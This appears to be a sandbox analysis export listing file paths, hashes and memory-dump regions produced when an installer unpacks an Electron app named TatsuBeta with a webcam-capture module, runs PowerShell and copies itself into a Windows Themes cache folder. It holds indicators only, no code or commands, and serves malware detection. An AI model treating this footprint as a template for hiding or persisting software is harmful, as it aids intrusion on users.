C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\bg.pak

MD5 5ba0c7200362c9ed55610cc8b66ef53c
SHA1 d45239c2f1b00885407771a41a7776fc1fe8fa3b
SHA256 2339ff55464b4ff704fc3c5bf281eec52a539c494bd059cf0346d9c05ab7cda7
SHA512 6229dbf08a9322c4ec8de4912aa1832f01800a71b7e3ef5870e7fa2b623be4dd248fec4881c3e031e984616147be84d42ab3dd970ae56dc1bd78913a8682a37a

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\ar.pak

MD5 6f3e791b4d35ee7d9515614d128752cf
SHA1 181ec3a84fb3e89336d77f24f562a2cbe07619d8
SHA256 e9df0fa338b763a3926c4ee3a87bedf650fa618b6fcf0560c3f5ffe891d48c60
SHA512 3657e610d13a2c938558ec320c298dd490c9e4895ccd304f738aaa2f050373efd7382ca402365f93d23ed488bae82de2d859da788dc8faa8e621346a278f4441

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\am.pak

MD5 e18a450ef034b42599341c3d09f280f1
SHA1 2001c8a85904962ac3a96938eccc69ad2c110fdf
SHA256 7c2b9098130f1f9e0cf4507b64c0e96ac6354bd6c3616be20e2067cfccc820da
SHA512 ddd87571218fe9f179a6c2a8a15b182625a71a7c19ed90c0969ca2e0e9bad823b926f8b8a6b390cb6fe9c95f4b6c1f1ec7b5167a8424ab1921943922208f798a

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\ro.pak

MD5 24b01a438a3ab9699d4ca97c081b5e82
SHA1 0d0b082544d23425a74199fb0a6c11192f0bdf7d
SHA256 38290b1c9712296d82ea1681ef95544a1eef4872289134b11e50af735e6deaca
SHA512 43199772312156f4633c4202499cde8f808e5e632c2013ec1129acee01a3f184e86df2616626173178efe04b6f0773ad9a0e8b8cc6a735d23d68dcfe9dfd945b

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\sw.pak

MD5 ed0c66fffa01a993a6f56218e059b81f
SHA1 06eb25559bb5533cb8adc99faec4b4866af13a86
SHA256 c4c292a6e30782044900fd4cf266d0c90776461f16c2e7203ff3821a0085e63c
SHA512 b8467b7e8200bfb7ec9b021de39fea30ed81c771f40d172ab821cc93cd4a8154e2fdd87717ad3935e2046a2dde62aeb10fd50feef93370dcbb9597aa17cf02a1

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\te.pak

MD5 4f5bdda31f2f80baafd05158a0937416
SHA1 42a9199ff616ed0a6d006f40cbcb181cbcf4f6ef
SHA256 4b1ecfc0eb4eff8ec67efdf450927cab2d989d2240eeecf5f30ed872f465bf5a
SHA512 7db802f411ba679f0dd4bc9df111c12377876c4564ef6f3cb1b6b5406af0a56819a7e80656b3c9e0f2c4fe13cbb9378773404e4e6e712fe3dc1e587b67b55688

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\ta.pak

MD5 3fa511c6c45b4ca27c33aa65c5704968
SHA1 4ca1fbd2eeab325d5dc564693369eadd724612f0
SHA256 276dc6b3417fc06a2b0a82016bf6cec978f75f649626643bc17f2a3e5bacd40e
SHA512 3e7eec9570e9842571c315b07a5cc5fe9e855979a0c5d9ec70659e88a0f41c0656f370ee64535720c96f58c6600577da2095674b563c619686905ae885c41bef

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\sv.pak

MD5 41e76f7775fc9a2d6e3c02c46e9b32f6
SHA1 088c15c74a68bee69682bf89c31055332b68c84a
SHA256 2533676479e9469ffcdaabcb47d3e39bebfe7ae2b80f70784e918a8827439e13
SHA512 6cde752d748c4772b533c8894f18134e5842113f8c7590b44a7dfa088aed65b232361fd16170df3b0d738066dbc3a769847adf4dd8ba42de63c9c2b33f9beb6b

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\sr.pak

MD5 af7083f2a4bd95dcbe792efade352662
SHA1 dc69aa831836016f6e66c6079931503d534a7862
SHA256 e3b80d9fdd420a05d66cc12e685ac94500106dd51a555bbfa2d085094f81e8dd
SHA512 342400ba94f6cd08152f96aa2b905184fab429c38cedb4bcb4ac0c503169a9ecd47aef208b4d7ffae08b0c0afa7aa089347a20739379d05f3e4e111be842b8c4

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\sl.pak

MD5 e015b6f5042be2dc96a4e23dcf035502
SHA1 7946509eed8db1e4c1f3da99ffe7155c86fdb4d6
SHA256 99536d1bc73eec81d5bebbff641ea195544ee5e3a41bb17ddcedf9cde9b141d4
SHA512 b2a2eaae93c506a053862bf1cde02eee53b3ea2e2fe4c964c51dbacb8b44de820a779311cfe01458e2f08f88bce1172e8c5e1e6d28cd3a355ff84baa00023b8f

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\sk.pak

MD5 b35daa0bd9627ca88b413a5af7c6b4a4
SHA1 d5efdcbc7ca17de29f3075f6434f31ab2e895826
SHA256 f47bc1f7f5ab64681d0b152e1a019da60f0ef057ee8bf2ccede019dc4030c177
SHA512 48abb6ca2290820db2898b05820bb25e70fb1292c816eb0c8f17b3c5452de9fff7027d216d2bf413900f408f44ed4ac99151b28142a212c5cff8dfe229e87b9b

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\ru.pak

MD5 6c9039d06d721c31252f57e7bc0469bd
SHA1 38489ef20e770e0d5991f1c50d5ff8b6a043d2d1
SHA256 8a58c286d5ad0930699573f720dd9707c62d26fd9bdd9a8edad23c31eb9a2e80
SHA512 0aca8aac65065b7797cbd5c2c908feba25e602b422575a424a74d9953f84fd35669bdd56a7bb13c61a96005174e81ce07f033a60a93d2c276c403b61f83b639f

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\pt-PT.pak

MD5 ecd84b296d3bb312ee18e21017311986
SHA1 f5625523f85c10723750834a54ff59a2dd886fb3
SHA256 fcfaa9c44c445876c286388b6a1abc1df949f3dda3d64fb57d6e0d54a05cdb94
SHA512 e95b74238220024cdd0bd1c0f18beadbbe427d76cd8d6b32d5700adcd34ffb068ad0bf75404921485c8077f395f5111cd40d5dfe2b5b8f34c62e6fc80b507456

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\pt-BR.pak

MD5 88ad860c73676ffb4025b5c691f29942
SHA1 3c5e5b999ea7153ccdd1b4cc7b6162de3456b558
SHA256 25f0bb0b0230d99a9064d52668636f3be85903bf27a68124d79a2fe93c30fe0e
SHA512 41589bb9ab1b8307f62ceb4e6493d7903731a3e63807e0044379c4acdda881c21839234f5f1b8ad1af732bfee6231c0556ce92e582505379ed949980185bb750

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\pl.pak

MD5 644c0ace25d6e532b56510a736c6bc2c
SHA1 1bd0fec952107b493da04c46423da634ff3e1504
SHA256 2ff9e382a31783285b7d85676e629e2f6db26bb9536ed17b7fbe5ac61a895ec7
SHA512 9a1f1e884c2f214b8b0c63543809ddd4ba0fd533f1d8434e926051f3db434f60cc4df2462c2a43254b2a9685b3869eef49463c212892e417c82c3a7b497e3559

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\nl.pak

MD5 cf6b1cbfd669e9461553974ba37a475e
SHA1 b33867e9bc7fd88ca98a76dc4bd756bcf18887aa
SHA256 9a83ad866ad7fd9d65ecbc1e95c276cfce27e8257c76a16950fd14971e66b864
SHA512 e463029bb37f6bb3ff5cb6281f64291ada1b785fa33137e7aedfc7b5e409e99c75a91e7cf9b6c0933e970f70c14861190de66fc5d68925b687a6f5da02e21077

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\nb.pak

MD5 b61e42f66d581b6a8929cdf5fb10662e
SHA1 6f06fa9ee092fbcb61bbd668734fb3b92cfb549a
SHA256 1b17dcde8fc7308d926fbe0faa83dfc9ffe2efc5715e9afd557dde839ad98b7e
SHA512 79b82346c3f133a6ba44148a8432ad4e08e2805187b759509cb386bc800fd20215592c07d953812c243f0b1d5e1354245f2cb42b2b3eb6c87280bcb4008dbe97

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\th.pak

MD5 43edd25f67ce6e6cea5373009ff0a1f8
SHA1 ed72ca6620cf23837e1334be50ccf616806bc5a2
SHA256 287897cf3df2db1cf59b872e6575ba8dfcaa0c1f68c17a9c91da6c4490adb8b0
SHA512 7160a72bd2e6b0ffa71e5d279995cc8be24a87cd9386eb29ab0eee79b8e607f5d824a11b6b4e3ef4c0f851a9d485a9642cb6adaa65c07933dca6e6f2c0052fc7

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\tr.pak

MD5 40491896ad21543f339467186c5efb40
SHA1 695dde7cc35056dcbf0a533aff8299d4c6b61bd8
SHA256 43e99e132acaba88971b81a43531845dc7fc3a1e0794c3373de7d9a50a5655aa
SHA512 18d5ee9914849462e0b1bafd1ca216b29d0795e282ae0bdb354b15caf5c18f37f44fbd6f626b2cbb095e3398a6496de72e5b0d15621433979b5a589e34fac818

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\zh-TW.pak

MD5 c2c35fcedc3708b5bcadf36587393002
SHA1 31d72402cbd44ceb921cedd806259c2cd14e411f
SHA256 cfe4c2c5eb131fd92e0d11f912714c5a9a048833ef3ffbe32679b3d58da8f8ac
SHA512 9ba3ea2d569d1d3ef09e94d7e66f843c8804368c4d016b6289e7dba002f7d2d50884a76c93eef879d87abcf8b36dd3e682b7bd3a18b2b5a969256cef672abf01

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\zh-CN.pak

MD5 098d656a4f4bd8240bed10e7678186c7
SHA1 0c19ab62b4262f1b51558e8aaa79e7741f73393a
SHA256 a55f568ad3a8854cec25699484f55024501c8a0967738ba694e073151e5981c7
SHA512 084538ce774233ca6d4393bb42239b0b85e11bd73dd19ba47e55796ca19848941b037510c0fca4ac08b4b2e0ccbc9b4ae72ef88a3e841738dd211961dc53c1e2

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\vi.pak

MD5 69c8796439192577f48bd249175aaf37
SHA1 97c52088ca69dada593db0e42b2135d264646454
SHA256 d7fdb53592de803a5fbcd8561c4918f1562f92fc8a3fd0039a2a1a7b76a8ecc2
SHA512 65eb7cb15291474ec7f9354775e59bcf334c90ddf3498ebd184e4c47118308421b2405bfa679e4b3a70ed1790e167c109fc2c72e89c3e31b5378cae975424144

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\locales\uk.pak

MD5 d7bdfcaaf9fdbfcf43e95ade6510dde9
SHA1 ed2e64ebe3b359c2d6457203b1da6179b26045ce
SHA256 7c5f3b4d99ee95316d01419a8f603b7e7834f7a2edd75d3dc9b7de79e7070007
SHA512 2aafd399c5edbf9ebbff92aeb00dc6b72b8e58a5106a718ccc8f6550c77befdc8eec958e486275069d83da070423f34cfcbdef75ce4c87fde0ff933f2aa900da

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\resources\elevate.exe

MD5 15f4d4aa311738b55f7b172efbf1897c
SHA1 9db44907a9fac6461135589e527d13df74b225a8
SHA256 4fcd430b4f455fba876682e83d57a5ac44d85e026ec60eed2424174444b7383c
SHA512 bd7dae3aa5c8ef9654eec5518cb96a7f2a524dbad3b3c0099e12cfd586787d9b9a5375208aaa06b52b674e470da625e7611c6af80a836d3a68218f3ccb378474

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\resources\app.asar

MD5 f4ad11c2f4c589c351e48023f7e3365f
SHA1 53778e7eabb08d65326e52471fbc63ac821e005d
SHA256 08c564945dd8f18567ebf6e382f8a1dc29374e17f0d3dd60b5d1036b4834214c
SHA512 4c6de3cbe241c80e022f1c4cecb9acf6d889994f0e36f957917e9977c65d8c22aefe84c5430b63aa3e6422ba32caa8cc53dde80a098a25c482523d8d73d60ccd

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

MD5 0f55aca7c64b4334e2c3ead7f1b81673
SHA1 13cbf24d2d9133c04c4f92ad71e6509dddec8ae1
SHA256 b2fb15f50b8d64e08b43574a2d074025b9a4678dca6ce54750f6c639260145a0
SHA512 3983327d8073ae0d27f581b94e063b67b595cb9e0c790f965b2ab6ef255d45c404702445734e6f7756684b1ebab1d629f952def5de584fc71ffab9110817e329

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

MD5 067e233b0609d56ff4756bedd8c0efe0
SHA1 96419d05adc4b6674948b4ac14f8ab5bb3ce4380
SHA256 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74
SHA512 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

MD5 471b15abc9f2e98fb7ed7361d3f045eb
SHA1 95b5798d80a9410872f6ed485ae2b43ca3745540
SHA256 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004
SHA512 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\swiftshader\libEGL.dll

MD5 44fd9a40e75086cc27d23c33f3a95dc0
SHA1 065500ab8b6ad14f9af847791a48bdc930d79412
SHA256 ac17f8a4c05d24208aaa9358a4516edf59d45dd3b3afb733efa42f3df2eef9da
SHA512 d0a2aa21d186e0ec129ea0ea647e73b0cd87f65d936c1f7f98624d904f8d523748e784eecb3abc2f2f44fa28a18613875134af99e3817f47d0fea3b58e5f354e

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

MD5 5d256dc9e733dd729e5c7ca9ba5fea7a
SHA1 7ed6d705f4fcd21575d059744072ba828333ef9b
SHA256 9c7e327a630e761298bbb993a01eef799ba27fd47554dd51031048b6f808b13c
SHA512 6b67dfee72eccbe76f878e8c0eeae9bf7aee72cc01a2d94588cfa1e3256f0b26157e2ba692be77c7e8df85059b470ea8b5e908eb5479ae7b234b55444203ce63

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\7z-out\swiftshader\libGLESv2.dll

MD5 661203dc0c825464a354ceae9ce342a5
SHA1 4a7e1bebdd7fc81507c742f773defe1a408853db
SHA256 7822ae17a112261545603af78cb2f6a3a7000955f64c6a9c800f6b72e700bac6
SHA512 5ed257e60de926c9402dab8e0d30d45d649c5e398cf1ff2b23359e615515b9489959ca7538302c16b51d88ff8a0f4d2d8332e594a315bcca6dfac26b49084249

C:\Users\Admin\AppData\Local\Temp\nsjA970.tmp\StdUtils.dll

MD5 62272d62ae22f6bee1569dfb34ef1bac
SHA1 2348743cc6b6ec0ef38eb10305bb2beb30096d64
SHA256 081fae7dc42623fa191334c8a0a59eab2e03fc8b2fe92fc298d3021a658f1232
SHA512 ef121b1a10ce8937a1d5550be9b17412f5632d9c8268238f7e71522aa1220daeaeda8601cb45bdaa2f6804e8dc4d6a418a014e131039eb97b3a07c683b937b31

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 fd1facd68a3bd3abe0dc95e430c1eb3b
SHA1 2e6d6c626b4148776d8eb517210b7761bc2e2418
SHA256 85fde18d76e1d958ddd3b661530a322290c22e586503dbf8d2f3f467a9a3aa82
SHA512 27c74270797224e700b1ece20979b9cc8f2e04f760286f32fdfb6e6adaf3b0b18e5a28a6cabfc00e5d9677e78c6ebfa61262527b227ce21f298fb2fedf91b328

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\v8_context_snapshot.bin

MD5 47014c0f81bad6d216c617c9c63bf040
SHA1 7bb483fdc5fed3c6ed437d9fe6e5023bc38201bf
SHA256 e1249d05bfc73c645b27d269f47b6923b33a3cf8088a8ca78b3b637c90f58178
SHA512 052d86cf3305a9e493bd2472e6b7ddab5e0291efd6d899984a79bae46e5fa4bd21157e19ab4a2591c9cff9069de568bad18c7baf4f35d117c77134e635466f87

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\icudtl.dat

MD5 101a9c452cc9c46a185cef59c9344482
SHA1 e89f11779ba4e59d01af89d9e34baa7a66abdd2f
SHA256 fd1e1e571476fb58c73e66dc4b96dd77b2c7be0923054a941d65ad6e751164be
SHA512 a1593b830e79fc964add9bbc52f79eb0bee1e6253e60f7ac22d19f3e59725e223099d4bb177706da1c663894936b5e66fc66e9fbcc24fdc8d7227f4cb0c77fd7

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 a858c000664558d6219b37e91ce522ce
SHA1 de4e41df2069bb5789de6400fa67f39d03e6f6fe
SHA256 1f808ae0b4caa299f99be35271ca2366db39bfc7636be654001061b65b26b1e4
SHA512 54069b19dea2e0bf6c2ac5da00212959cead3bf1aad8e2af2127f3353108c2d2177f0c30b50e99b5cdbceca779790b28ec76c1b05e57013f6826a71eb8df24d2

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 9db1261e0e3bb10b5a256df79fe710ff
SHA1 67135e7bb538e7a6004f3abd18999226f1c16d15
SHA256 1844e4d89d2ad30dd2e035937614475b463bceba9bf479c802126950d8ad7658
SHA512 b4ebb5da663e1d3ec2a864d5cc77c7e3c7f12bfb90b3be1b48c38171c7fc7a0f4650a2db62e09337315185c8ba80c50375d5629d0575b04c000a7c2e6f4728ec

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar

MD5 c05d78d76c6bfc7affc9280ef426d5f1
SHA1 c4d58654601b0dfa1ec36b528304198aa96e43c9
SHA256 97b71d6a79ab42a1abc29b248f0165cd882a3c3fe96c796d3106dbb8031b8baa
SHA512 a9a891c312bd7fdc3577414e9fcdcde127e35881d2ea1e89ebbc1e9c5635bdaf58672d629fd3e9b1420fbfca1424f4f08f8098efa91e18f8255dd3080f9898fb

C:\Users\Admin\AppData\Local\Temp\a7d0fdbc-f2dc-4fae-9e67-5ad9f2185de6.tmp.node

MD5 5d39a54a062273cfb53436c708e9e22d
SHA1 7c781b7a4e89fb324db4506f81d8be1f95a04aca
SHA256 399dd53e2648356b84c11af27ed99485c64690ae7134545965006bc4f1af9536
SHA512 901070b3b585b3e9dbc7231b23f12703bac2f6e99309b528c3b4077580b2cde7be70fb2cc974efdb661e8cf7e87096cb3cd6eb60c6577f82c77b3ce894839857

C:\Users\Admin\AppData\Local\Temp\9994658c-75f3-4115-8ba9-822f08dacbcb.tmp.node

MD5 5317f23583ba935be25a4c26b3f93828
SHA1 bdc288a0576a9ca04295c2df6f71e260ae5097bc
SHA256 41db88f72dbc4ace9b4e6522b19f60e012980345fcb737cab1839ab0bb2f2cb3
SHA512 e3975f92f6bbd814cec4b6762b7f7475168dd43a717031de0d8055b7f5e4ce01dd011557c1301f9f9084f8a39248630c12f265a195c54c81f1efad9dd5bd91d0

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources.pak

MD5 87bd4d0b86be99229c1dcae10f34b78d
SHA1 0cf766302bec38159587bf89841b26bcc52ae248
SHA256 236c886dd11b763738e01b45a0e79dab36eb148a886f1b8cfe92cb383fbcf2a5
SHA512 44e1e0e79bf1f8a214564b9e29aeedff65ac3ab78a7175ecbb8d24966b795f678e04ee7b2e6a469d3ccf69aa5f7d7dfe86dfeabec13f043011383d39d095b393

memory/4084-578-0x00007FFE43CF0000-0x00007FFE43CF1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 6dc606fadab62e59c4eb63d9ce4e9208
SHA1 f435076ba96ee42d0cd8b063f5708f8bffa8f489
SHA256 046e5630c0ba00f01515731a369fc866c3d6b67d6febabb4f0ff1e3581e4f2c2
SHA512 ff8f3fbc4fc610d3b3a430bd565decb71c17cb41c256d9eb4d289cce22fd06d1694cb900cd19349108867717cea103958658f8add3887afa9cac38de1041eb12

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 821bda75b51dcfd83a790cd95dc710fb
SHA1 5c7885cb72d8ee8c1d6834f30aa3fb60b8ddea3d
SHA256 33c8db69bad07ca5bbeff8238f8da2e6f9dc4550d3acbb3b01e0cf6d1ae75058
SHA512 828bbb46ba168966b2aaea5dbd2db49eaf28e280de1ad5983b29e781082a63e8e295886f1fa83e957a093c2378c8d31ab9121b31558ef0cd36a3776c839508de

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libEGL.dll

MD5 8352fd22f09b873193cabc2932be92f0
SHA1 5bd2b58854b279f1733c5f54ea2669ee8a888d9e
SHA256 14a4aaa010be14762edfee01fd1f6b9943471eb7a2f9011a2b5c230461cd129c
SHA512 7281e980f2e82f1cc8173d9f8387a97f6e23ec5099ed8dca02222c4e17fa4cfef59d6aa300b1cf06d502bdcf77d9a6dbb08ad6658ae0a28ae6f9f995109da0d2

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 8bc84472ef2b5621e12f2e60febc61f9
SHA1 a2fe3ba7f20bfb92a38060b64965921dd13689a4
SHA256 7d2ac5663cddebd90d609165a4625326f533cd7725504393469937a8b2a4bc4d
SHA512 d703a45b75630c0a10c9d837d75d3c0da91c92c4c039338d93c5689264c6a940fa9feae21ed557677b38185bfb461bd2efebfa65a7d0e0aa98f7abcb4b939292

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 496193217ce47e766c14767d3d281f36
SHA1 6f0604d75cd370bc16d8f1e882bd7dde9a78af7d
SHA256 34b98ae5fe49f8d943605cec21a175eabe07c9c261a32cc31598f3f42817d37a
SHA512 c05083d60d1ab54d01da238a52b904adc8234b675d7f9c5d5021dcf59e2fef6be5178bec09f527e497c6fda519bdfc97f3e1a8f7b084c883668da476b3846445

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libGLESv2.dll

MD5 d943bd6635e8b91a1e7f6c7a4eb4d955
SHA1 9883473ac58f0d05a5f0586201e9c7687ec0820b
SHA256 dd56c541f3c068e672187cc26877ebe1bae875087a3311761d13f739ec01952b
SHA512 b40948f9a1d8a499f54bff71a1e7f962a1134ff28d6fbb98970a68f5856aea2097d3f9770c9c79219e0e2cc83c6bfc5f35193c303c9db8d6568f1f6950db906c

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libglesv2.dll

MD5 67aadb3d0be8f17ead4c9d26c3a99f43
SHA1 6c5c7914e088cc2b11ed1fd42e5363be5c616da8
SHA256 f56e9a47ff6b1af0796b54fb80871f822ca3a0c8bfea46468b06aa12f2298c7f
SHA512 7c38f4928628778381b40938df994821e7c78980cfc96365afd8ee51af050aea4ca11b55284fc0c3e1266efb20115f99a955cfcbbd9a528367f85c4bf23c80a4

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\d3dcompiler_47.dll

MD5 c0bd80d7d3a2eccf9830151f239007df
SHA1 255641f35ee028d559aee81c575bf81d360b2555
SHA256 66fae59ae1db0068775a605d155a6d7cd7f0b514484f5bb09c76483514ba875f
SHA512 22b5479dc058d5ba1c90f64ada9bf51cf91cc31aa19c20ac3774a5b08e8bdf31d500637838574aa0701c009a75c9a3aee2b5f64e6a816f24033e301173057cd9

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\D3DCompiler_47.dll

MD5 b500c96d705d5b787c1da1a63e3af396
SHA1 ed6b4ec3aa491a860ad8e2bc6b28a16d06914641
SHA256 bba9bb558b41589bb30b432bc5cf06cf74cfe26156aac75f90a33a9b7717a1ae
SHA512 6982569fd44d9b132e0a0e774bd7024b25975b4252aad5efc91dace476d2c6387308c2d49850f9b5fa3f412f076ddc11757ef22d32b7c4237c162f0c8ee9e030

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 3c060b00b4e48c3fddb5a61418019d1d
SHA1 a6496a1c7c6d185352797883225614371d6b4f28
SHA256 c2316b3674e7db7141a9005cb00b5f50d871a7732a725010e4fc9001074e3648
SHA512 e01abf8cf91a2ade7eb2d07817530ca8351e2517f0498a7bdef8db12d2df56950ff48514180b53bead2b0d112d8ef3fe8ba6332e6ca169dd01483160c51d35f4

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r2j30odd.su1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3440-611-0x000001F9CDA90000-0x000001F9CDAA0000-memory.dmp

memory/3440-613-0x000001F9CDA90000-0x000001F9CDAA0000-memory.dmp

memory/3440-612-0x000001F9CDA90000-0x000001F9CDAA0000-memory.dmp

memory/3440-610-0x00007FFE21710000-0x00007FFE221D2000-memory.dmp

memory/3440-609-0x000001F9CDB90000-0x000001F9CDBB2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 88dc70c361a22feac57b031dd9c1f02f
SHA1 a9b4732260c2a323750022a73480f229ce25d46d
SHA256 43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59
SHA512 19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

memory/3440-617-0x00007FFE21710000-0x00007FFE221D2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

memory/3984-629-0x0000017E3A470000-0x0000017E3A480000-memory.dmp

memory/3984-631-0x0000017E3A470000-0x0000017E3A480000-memory.dmp

memory/3984-620-0x00007FFE21710000-0x00007FFE221D2000-memory.dmp

memory/3984-634-0x00007FFE21710000-0x00007FFE221D2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

memory/2340-649-0x00007FFE217C0000-0x00007FFE22282000-memory.dmp

memory/2340-651-0x000001A126D40000-0x000001A126D50000-memory.dmp

memory/2340-650-0x000001A126D40000-0x000001A126D50000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe

MD5 9805c2ef838745d4b563a35f3a4a7b1d
SHA1 dd421aabd526b618d4e5c222c0a5429910bb62df
SHA256 230b7fdcf50070accbb6eed7da61ee80556eb0763e621122c6a5aa661350b5ca
SHA512 5e9ad91544c9f9758e3dcb922a3bc2334129422ac5aeef2cee78cfaae4451555daa1781c3fbfd9aa810c17bbd90c8a95ef1b7ec98c76516beb911784a64ee237

memory/2340-654-0x00007FFE217C0000-0x00007FFE22282000-memory.dmp

memory/5968-656-0x00007FFE217C0000-0x00007FFE22282000-memory.dmp

memory/5968-657-0x000001E5E52A0000-0x000001E5E52B0000-memory.dmp

memory/5968-658-0x000001E5E52A0000-0x000001E5E52B0000-memory.dmp

memory/5968-669-0x00007FFE217C0000-0x00007FFE22282000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9b5655b797c26ffc04f79597d8d56eba
SHA1 8b6d6e58ab350bf1c526ed324e523f4f0cf808f0
SHA256 5893e9041f26e97ce9864f245da1211ae2570503facf24a5bb21ee7b858c9548
SHA512 89549717ce4b618fc68df01066d0cc1d3198a94e616fa84e563e5cbcd2f9aae4dff4599d5b8e013ab5e8da798c669dd41751d25f988f729bf8bc8ed0fd9645ae

memory/7336-683-0x0000021151BD0000-0x0000021151BE0000-memory.dmp

memory/7336-681-0x0000021151BD0000-0x0000021151BE0000-memory.dmp

memory/7336-680-0x0000021151BD0000-0x0000021151BE0000-memory.dmp

